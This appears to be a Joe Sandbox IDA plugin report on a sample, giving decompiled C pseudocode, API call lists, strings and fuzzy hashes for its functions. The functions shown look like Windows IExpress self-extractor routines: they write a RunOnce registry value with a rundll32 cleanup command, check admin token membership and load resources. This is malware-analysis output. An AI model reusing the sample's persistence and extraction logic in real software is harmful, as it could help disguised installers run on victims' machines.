                                                						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                							_push(_t47);
                                                							memset( &_v268, 0, 0x104);
                                                							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                								E0038658A( &_v268, 0x104, 0x381140);
                                                							}
                                                							_push("C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
                                                							E0038171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                							_t42 =  &_v836;
                                                							_t45 = _t42 + 1;
                                                							_pop(_t47);
                                                							do {
                                                								_t33 =  *_t42;
                                                								_t42 = _t42 + 1;
                                                							} while (_t33 != 0);
                                                							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                						}
                                                						_t20 = RegCloseKey(_v840);
                                                						_pop(_t38);
                                                					}
                                                					_pop(_t49);
                                                				}
                                                				return E00386CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                			}



















                                                0x00382272
                                                0x00382277
                                                0x00382279
                                                0x00382283
                                                0x00382289
                                                0x003822ab
                                                0x003822b1
                                                0x003822c4
                                                0x003822e0
                                                0x003822e6
                                                0x003822f5
                                                0x0038230d
                                                0x0038231c
                                                0x0038231c
                                                0x00382321
                                                0x0038233a
                                                0x00382342
                                                0x00382348
                                                0x0038234b
                                                0x0038234c
                                                0x0038234c
                                                0x0038234e
                                                0x0038234f
                                                0x0038236e
                                                0x0038236e
                                                0x0038237a
                                                0x00382380
                                                0x00382380
                                                0x00382381
                                                0x00382381
                                                0x0038238f

                                                APIs
                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 003822A3
                                                • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 003822D8
                                                • memset.MSVCRT ref: 003822F5
                                                • GetSystemDirectoryA.KERNEL32 ref: 00382305
                                                • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0038236E
                                                • RegCloseKey.ADVAPI32(?), ref: 0038237A
                                                Strings
                                                • wextract_cleanup0, xrefs: 0038227C, 003822CD, 00382363
                                                • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00382299
                                                • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0038232D
                                                • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00382321
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                • API String ID: 3027380567-2874043782
                                                • Opcode ID: 8d2e9cbbbab650e7a66144a766eea7f7f1b4a4859b87f93e3f1e557089f215ed
                                                • Instruction ID: 1a5d9a031643b3d9dfa99a2f8407a84b26b36bbb4da6555524b5ef9ce143d716
                                                • Opcode Fuzzy Hash: 8d2e9cbbbab650e7a66144a766eea7f7f1b4a4859b87f93e3f1e557089f215ed
                                                • Instruction Fuzzy Hash: 67319875A003186BDB23AB61DC49FEB777CEB55700F4401EAF90DAA051DA75AB88CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 87%
                                                			E00383100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                				void* _t8;
                                                				void* _t11;
                                                				void* _t15;
                                                				struct HWND__* _t16;
                                                				struct HWND__* _t33;
                                                				struct HWND__* _t34;
                                                
                                                				_t8 = _a8 - 0xf;
                                                				if(_t8 == 0) {
                                                					if( *0x388590 == 0) {
                                                						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                						 *0x388590 = 1;
                                                					}
                                                					L13:
                                                					return 0;
                                                				}
                                                				_t11 = _t8 - 1;
                                                				if(_t11 == 0) {
                                                					L7:
                                                					_push(0);
                                                					L8:
                                                					EndDialog(_a4, ??);
                                                					L9:
                                                					return 1;
                                                				}
                                                				_t15 = _t11 - 0x100;
                                                				if(_t15 == 0) {
                                                					_t16 = GetDesktopWindow();
                                                					_t33 = _a4;
                                                					E003843D0(_t33, _t16);
                                                					SetDlgItemTextA(_t33, 0x834,  *0x388d4c);
                                                					SetWindowTextA(_t33, "lega");
                                                					SetForegroundWindow(_t33);
                                                					_t34 = GetDlgItem(_t33, 0x834);
                                                					 *0x3888b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                					SetWindowLongA(_t34, 0xfffffffc, E003830C0);
                                                					return 1;
                                                				}
                                                				if(_t15 != 1) {
                                                					goto L13;
                                                				}
                                                				if(_a12 != 6) {
                                                					if(_a12 != 7) {
                                                						goto L9;
                                                					}
                                                					goto L7;
                                                				}
                                                				_push(1);
                                                				goto L8;
                                                			}









                                                0x00383108
                                                0x0038310b
                                                0x003831b7
                                                0x003831ca
                                                0x003831d0
                                                0x003831d0
                                                0x003831da
                                                0x00000000
                                                0x003831da
                                                0x00383111
                                                0x00383114
                                                0x00383136
                                                0x00383136
                                                0x00383138
                                                0x0038313b
                                                0x00383141
                                                0x00000000
                                                0x00383143
                                                0x00383116
                                                0x0038311b
                                                0x0038314b
                                                0x00383151
                                                0x00383158
                                                0x0038316a
                                                0x00383176
                                                0x0038317d
                                                0x0038318b
                                                0x0038319e
                                                0x003831a3
                                                0x00000000
                                                0x003831ad
                                                0x00383120
                                                0x00000000
                                                0x00000000
                                                0x0038312a
                                                0x00383134
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00383134
                                                0x0038312c
                                                0x00000000

                                                APIs
                                                • EndDialog.USER32(?,00000000), ref: 0038313B
                                                • GetDesktopWindow.USER32 ref: 0038314B
                                                • SetDlgItemTextA.USER32(?,00000834), ref: 0038316A
                                                • SetWindowTextA.USER32(?,lega), ref: 00383176
                                                • SetForegroundWindow.USER32(?), ref: 0038317D
                                                • GetDlgItem.USER32(?,00000834), ref: 00383185
                                                • GetWindowLongA.USER32(00000000,000000FC), ref: 00383190
                                                • SetWindowLongA.USER32(00000000,000000FC,003830C0), ref: 003831A3
                                                • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 003831CA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                • String ID: lega
                                                • API String ID: 3785188418-245445314
                                                • Opcode ID: a3d396435dc2ad8e921bd75bcbb44544a0cd5d1fa9ecc1daa048446d30392548
                                                • Instruction ID: e57d7d891ed8d122bf9e889e1af7bbeb7316cdeff92408bf7add5d8f46c77c57
                                                • Opcode Fuzzy Hash: a3d396435dc2ad8e921bd75bcbb44544a0cd5d1fa9ecc1daa048446d30392548
                                                • Instruction Fuzzy Hash: A211B131204711BBEB237F24AC0CBAA3A6CFB4AF20F110692F815916E0DBB49741D742
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 82%
                                                			E0038468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                				long _t4;
                                                				void* _t11;
                                                				CHAR* _t14;
                                                				void* _t15;
                                                				long _t16;
                                                
                                                				_t14 = __ecx;
                                                				_t11 = __edx;
                                                				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                				_t16 = _t4;
                                                				if(_t16 <= _a4 && _t11 != 0) {
                                                					if(_t16 == 0) {
                                                						L5:
                                                						return 0;
                                                					}
                                                					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                					if(_t15 == 0) {
                                                						goto L5;
                                                					}
                                                					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                					FreeResource(_t15);
                                                					return _t16;
                                                				}
                                                				return _t4;
                                                			}








                                                0x00384699
                                                0x0038469b
                                                0x003846a9
                                                0x003846af
                                                0x003846b4
                                                0x003846bc
                                                0x003846f9
                                                0x00000000
                                                0x003846f9
                                                0x003846d9
                                                0x003846dd
                                                0x00000000
                                                0x00000000
                                                0x003846e5
                                                0x003846ef
                                                0x00000000
                                                0x003846f5
                                                0x003846ff

                                                APIs
                                                • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003846A0
                                                • SizeofResource.KERNEL32(00000000,00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846A9
                                                • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003846C3
                                                • LoadResource.KERNEL32(00000000,00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846CC
                                                • LockResource.KERNEL32(00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846D3
                                                • memcpy_s.MSVCRT ref: 003846E5
                                                • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003846EF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                • String ID: TITLE$lega
                                                • API String ID: 3370778649-934471404
                                                • Opcode ID: fb5186acb0739c2b5c4cc04c7a4d10ded6161672b259f8f2122487f22e8b335c
                                                • Instruction ID: 267d27f64b058c6c8c86f62813a1fb2372c1107d6aa7058468c21025c0350ddf
                                                • Opcode Fuzzy Hash: fb5186acb0739c2b5c4cc04c7a4d10ded6161672b259f8f2122487f22e8b335c
                                                • Instruction Fuzzy Hash: F00128722407017BF3222BA56C0CF2B3E2CDBCAF62F090095FA4997180D9B18C4083B2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 94%
                                                			E0038681F(void* __ebx) {
                                                				signed int _v8;
                                                				char _v20;
                                                				struct _OSVERSIONINFOA _v168;
                                                				void* _v172;
                                                				int* _v176;
                                                				int _v180;
                                                				int _v184;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t19;
                                                				long _t31;
                                                				signed int _t35;
                                                				void* _t36;
                                                				intOrPtr _t41;
                                                				signed int _t44;
                                                
                                                				_t36 = __ebx;
                                                				_t19 =  *0x388004; // 0xb25159a8
                                                				_v8 = _t19 ^ _t44;
                                                				_t41 =  *0x3881d8; // 0x0
                                                				_t43 = 0;
                                                				_v180 = 0xc;
                                                				_v176 = 0;
                                                				if(_t41 == 0xfffffffe) {
                                                					 *0x3881d8 = 0;
                                                					_v168.dwOSVersionInfoSize = 0x94;
                                                					if(GetVersionExA( &_v168) == 0) {
                                                						L12:
                                                						_t41 =  *0x3881d8; // 0x0
                                                					} else {
                                                						_t41 = 1;
                                                						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                							goto L12;
                                                						} else {
                                                							_t31 = RegQueryValueExA(_v172, 0x381140, 0,  &_v184,  &_v20,  &_v180);
                                                							_t43 = _t31;
                                                							RegCloseKey(_v172);
                                                							if(_t31 != 0) {
                                                								goto L12;
                                                							} else {
                                                								_t40 =  &_v176;
                                                								if(E003866F9( &_v20,  &_v176) == 0) {
                                                									goto L12;
                                                								} else {
                                                									_t35 = _v176 & 0x000003ff;
                                                									if(_t35 == 1 || _t35 == 0xd) {
                                                										 *0x3881d8 = _t41;
                                                									} else {
                                                										goto L12;
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				_t18 =  &_v8; // 0x38463b
                                                				return E00386CE0(_t41, _t36,  *_t18 ^ _t44, _t40, _t41, _t43);
                                                			}


















                                                0x0038681f
                                                0x0038682a
                                                0x00386831
                                                0x00386836
                                                0x0038683c
                                                0x0038683e
                                                0x00386848
                                                0x00386851
                                                0x0038685d
                                                0x00386864
                                                0x00386876
                                                0x0038693a
                                                0x0038693a
                                                0x0038687c
                                                0x0038687e
                                                0x00386885
                                                0x00000000
                                                0x003868d6
                                                0x003868f4
                                                0x00386900
                                                0x00386902
                                                0x0038690a
                                                0x00000000
                                                0x0038690c
                                                0x0038690c
                                                0x0038691c
                                                0x00000000
                                                0x0038691e
                                                0x00386924
                                                0x0038692b
                                                0x00386932
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0038692b
                                                0x0038691c
                                                0x0038690a
                                                0x00386885
                                                0x00386876
                                                0x00386940
                                                0x00386951

                                                APIs
                                                • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0038686E
                                                • GetSystemMetrics.USER32(0000004A), ref: 003868A7
                                                • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 003868CC
                                                • RegQueryValueExA.ADVAPI32(?,00381140,00000000,?,?,0000000C), ref: 003868F4
                                                • RegCloseKey.ADVAPI32(?), ref: 00386902
                                                  • Part of subcall function 003866F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0038691A), ref: 00386741
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                • String ID: ;F8$Control Panel\Desktop\ResourceLocale
                                                • API String ID: 3346862599-4254851587
                                                • Opcode ID: e0c813a3f3c7829e7b06fb292cdc0396edc65d869807867bcb672bd9012334f6
                                                • Instruction ID: 5d02f63177b884b93f4ce60a49e1ff4cd7fbb5e34b3629b6b43188526bf96c8a
                                                • Opcode Fuzzy Hash: e0c813a3f3c7829e7b06fb292cdc0396edc65d869807867bcb672bd9012334f6
                                                • Instruction Fuzzy Hash: 5B316F71A00318DFDB33EB51CD46BAAB7BCEB85768F0101E5E949A6180DB309E85CF52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 57%
                                                			E003817EE(intOrPtr* __ecx) {
                                                				signed int _v8;
                                                				short _v12;
                                                				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                				_Unknown_base(*)()* _v20;
                                                				void* _v24;
                                                				intOrPtr* _v28;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t14;
                                                				_Unknown_base(*)()* _t20;
                                                				long _t28;
                                                				void* _t35;
                                                				struct HINSTANCE__* _t36;
                                                				signed int _t38;
                                                				intOrPtr* _t39;
                                                
                                                				_t14 =  *0x388004; // 0xb25159a8
                                                				_v8 = _t14 ^ _t38;
                                                				_v12 = 0x500;
                                                				_t37 = __ecx;
                                                				_v16.Value = 0;
                                                				_v28 = __ecx;
                                                				_t28 = 0;
                                                				_t36 = LoadLibraryA("advapi32.dll");
                                                				if(_t36 != 0) {
                                                					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                					_v20 = _t20;
                                                					if(_t20 != 0) {
                                                						 *_t37 = 0;
                                                						_t28 = 1;
                                                						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                							_t37 = _t39;
                                                							 *0x38a288(0, _v24, _v28);
                                                							_v20();
                                                							if(_t39 != _t39) {
                                                								asm("int 0x29");
                                                							}
                                                							FreeSid(_v24);
                                                						}
                                                					}
                                                					FreeLibrary(_t36);
                                                				}
                                                				return E00386CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                			}



















                                                0x003817f6
                                                0x003817fd
                                                0x00381805
                                                0x0038180b
                                                0x0038180d
                                                0x00381815
                                                0x00381818
                                                0x00381820
                                                0x00381824
                                                0x0038182c
                                                0x00381832
                                                0x00381837
                                                0x00381851
                                                0x00381854
                                                0x0038185d
                                                0x00381862
                                                0x0038186c
                                                0x00381872
                                                0x00381877
                                                0x0038187e
                                                0x0038187e
                                                0x00381883
                                                0x00381883
                                                0x0038185d
                                                0x0038188a
                                                0x0038188a
                                                0x003818a2

                                                APIs
                                                • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,003818DD), ref: 0038181A
                                                • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0038182C
                                                • AllocateAndInitializeSid.ADVAPI32(003818DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,003818DD), ref: 00381855
                                                • FreeSid.ADVAPI32(?,?,?,?,003818DD), ref: 00381883
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,003818DD), ref: 0038188A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                • String ID: CheckTokenMembership$advapi32.dll
                                                • API String ID: 4204503880-1888249752
                                                • Opcode ID: 982942627e83767fb488f37388f077e13bf3748849398773df907dad9a782e51
                                                • Instruction ID: 996031a9dcf2bb69b3968e56b1592dac847bc92ee938bf24cf682ba8e488114b
                                                • Opcode Fuzzy Hash: 982942627e83767fb488f37388f077e13bf3748849398773df907dad9a782e51
                                                • Instruction Fuzzy Hash: F7116A71E00305AFDB12AFA4DC4AABEB77CEF44701F1105AAF905E6250DA719D058791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00383450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                				void* _t7;
                                                				void* _t11;
                                                				struct HWND__* _t12;
                                                				int _t22;
                                                				struct HWND__* _t24;
                                                
                                                				_t7 = _a8 - 0x10;
                                                				if(_t7 == 0) {
                                                					EndDialog(_a4, 2);
                                                					L11:
                                                					return 1;
                                                				}
                                                				_t11 = _t7 - 0x100;
                                                				if(_t11 == 0) {
                                                					_t12 = GetDesktopWindow();
                                                					_t24 = _a4;
                                                					E003843D0(_t24, _t12);
                                                					SetWindowTextA(_t24, "lega");
                                                					SetDlgItemTextA(_t24, 0x838,  *0x389404);
                                                					SetForegroundWindow(_t24);
                                                					goto L11;
                                                				}
                                                				if(_t11 == 1) {
                                                					_t22 = _a12;
                                                					if(_t22 < 6) {
                                                						goto L11;
                                                					}
                                                					if(_t22 <= 7) {
                                                						L8:
                                                						EndDialog(_a4, _t22);
                                                						return 1;
                                                					}
                                                					if(_t22 != 0x839) {
                                                						goto L11;
                                                					}
                                                					 *0x3891dc = 1;
                                                					goto L8;
                                                				}
                                                				return 0;
                                                			}








                                                0x00383459
                                                0x0038345c
                                                0x003834d8
                                                0x003834de
                                                0x00000000
                                                0x003834e0
                                                0x0038345e
                                                0x00383463
                                                0x0038349a
                                                0x003834a0
                                                0x003834a7
                                                0x003834b2
                                                0x003834c4
                                                0x003834cb
                                                0x00000000
                                                0x003834cb
                                                0x00383468
                                                0x0038346e
                                                0x00383474
                                                0x00000000
                                                0x00000000
                                                0x0038347c
                                                0x0038348c
                                                0x00383490
                                                0x00000000
                                                0x00383496
                                                0x00383484
                                                0x00000000
                                                0x00000000
                                                0x00383486
                                                0x00000000
                                                0x00383486
                                                0x00000000

                                                APIs
                                                • EndDialog.USER32(?,?), ref: 00383490
                                                • GetDesktopWindow.USER32 ref: 0038349A
                                                • SetWindowTextA.USER32(?,lega), ref: 003834B2
                                                • SetDlgItemTextA.USER32(?,00000838), ref: 003834C4
                                                • SetForegroundWindow.USER32(?), ref: 003834CB
                                                • EndDialog.USER32(?,00000002), ref: 003834D8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: Window$DialogText$DesktopForegroundItem
                                                • String ID: lega
                                                • API String ID: 852535152-245445314
                                                • Opcode ID: 03cfdaeb1aa777ebe13b4e19f50b02b25d04c3f38db6ac860b3e5f8c663084d2
                                                • Instruction ID: 7fab56c1a88faeba010158cec58b9a4a0a42378db878cd93cae9f6e6cd2d6a19
                                                • Opcode Fuzzy Hash: 03cfdaeb1aa777ebe13b4e19f50b02b25d04c3f38db6ac860b3e5f8c663084d2
                                                • Instruction Fuzzy Hash: BC01B131240714ABEB176F66DC0C97D3A68EB05F10F024492F94787AA0CB709F51CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 95%
                                                			E00382AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                				signed int _v8;
                                                				char _v268;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t16;
                                                				int _t21;
                                                				char _t32;
                                                				intOrPtr _t34;
                                                				char* _t38;
                                                				char _t42;
                                                				char* _t44;
                                                				CHAR* _t52;
                                                				intOrPtr* _t55;
                                                				CHAR* _t59;
                                                				void* _t62;
                                                				CHAR* _t64;
                                                				CHAR* _t65;
                                                				signed int _t66;
                                                
                                                				_t60 = __edx;
                                                				_t16 =  *0x388004; // 0xb25159a8
                                                				_t17 = _t16 ^ _t66;
                                                				_v8 = _t16 ^ _t66;
                                                				_t65 = _a4;
                                                				_t44 = __edx;
                                                				_t64 = __ecx;
                                                				if( *((char*)(__ecx)) != 0) {
                                                					GetModuleFileNameA( *0x389a3c,  &_v268, 0x104);
                                                					while(1) {
                                                						_t17 =  *_t64;
                                                						if(_t17 == 0) {
                                                							break;
                                                						}
                                                						_t21 = IsDBCSLeadByte(_t17);
                                                						 *_t65 =  *_t64;
                                                						if(_t21 != 0) {
                                                							_t65[1] = _t64[1];
                                                						}
                                                						if( *_t64 != 0x23) {
                                                							L19:
                                                							_t65 = CharNextA(_t65);
                                                						} else {
                                                							_t64 = CharNextA(_t64);
                                                							if(CharUpperA( *_t64) != 0x44) {
                                                								if(CharUpperA( *_t64) != 0x45) {
                                                									if( *_t64 == 0x23) {
                                                										goto L19;
                                                									}
                                                								} else {
                                                									E00381680(_t65, E003817C8(_t44, _t65),  &_v268);
                                                									_t52 = _t65;
                                                									_t14 =  &(_t52[1]); // 0x2
                                                									_t60 = _t14;
                                                									do {
                                                										_t32 =  *_t52;
                                                										_t52 =  &(_t52[1]);
                                                									} while (_t32 != 0);
                                                									goto L17;
                                                								}
                                                							} else {
                                                								E003865E8( &_v268);
                                                								_t55 =  &_v268;
                                                								_t62 = _t55 + 1;
                                                								do {
                                                									_t34 =  *_t55;
                                                									_t55 = _t55 + 1;
                                                								} while (_t34 != 0);
                                                								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                									 *_t38 = 0;
                                                								}
                                                								E00381680(_t65, E003817C8(_t44, _t65),  &_v268);
                                                								_t59 = _t65;
                                                								_t12 =  &(_t59[1]); // 0x2
                                                								_t60 = _t12;
                                                								do {
                                                									_t42 =  *_t59;
                                                									_t59 =  &(_t59[1]);
                                                								} while (_t42 != 0);
                                                								L17:
                                                								_t65 =  &(_t65[_t52 - _t60]);
                                                							}
                                                						}
                                                						_t64 = CharNextA(_t64);
                                                					}
                                                					 *_t65 = _t17;
                                                				}
                                                				return E00386CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                			}






















                                                0x00382aac
                                                0x00382ab7
                                                0x00382abc
                                                0x00382abe
                                                0x00382ac3
                                                0x00382ac6
                                                0x00382ac9
                                                0x00382ace
                                                0x00382ae6
                                                0x00382bdc
                                                0x00382bdc
                                                0x00382be0
                                                0x00000000
                                                0x00000000
                                                0x00382af2
                                                0x00382afc
                                                0x00382b00
                                                0x00382b05
                                                0x00382b05
                                                0x00382b0b
                                                0x00382bca
                                                0x00382bd1
                                                0x00382b11
                                                0x00382b18
                                                0x00382b26
                                                0x00382b99
                                                0x00382bc8
                                                0x00000000
                                                0x00000000
                                                0x00382b9b
                                                0x00382bae
                                                0x00382bb3
                                                0x00382bb5
                                                0x00382bb5
                                                0x00382bb8
                                                0x00382bb8
                                                0x00382bba
                                                0x00382bbb
                                                0x00000000
                                                0x00382bb8
                                                0x00382b28
                                                0x00382b2e
                                                0x00382b33
                                                0x00382b39
                                                0x00382b3c
                                                0x00382b3c
                                                0x00382b3e
                                                0x00382b3f
                                                0x00382b55
                                                0x00382b5d
                                                0x00382b64
                                                0x00382b64
                                                0x00382b7a
                                                0x00382b7f
                                                0x00382b81
                                                0x00382b81
                                                0x00382b84
                                                0x00382b84
                                                0x00382b86
                                                0x00382b87
                                                0x00382bbf
                                                0x00382bc1
                                                0x00382bc1
                                                0x00382b26
                                                0x00382bda
                                                0x00382bda
                                                0x00382be6
                                                0x00382be6
                                                0x00382bf8

                                                APIs
                                                • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00382AE6
                                                • IsDBCSLeadByte.KERNEL32(00000000), ref: 00382AF2
                                                • CharNextA.USER32(?), ref: 00382B12
                                                • CharUpperA.USER32 ref: 00382B1E
                                                • CharPrevA.USER32(?,?), ref: 00382B55
                                                • CharNextA.USER32(?), ref: 00382BD4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                • String ID:
                                                • API String ID: 571164536-0
                                                • Opcode ID: 550d4323dd1f25497eb959b3df04d7d9972837aa2832859f4a5c7fee1626825d
                                                • Instruction ID: 266dbc8928cef58145818dd5a387f4e540842ac738206e4dec79e41d32cd4142
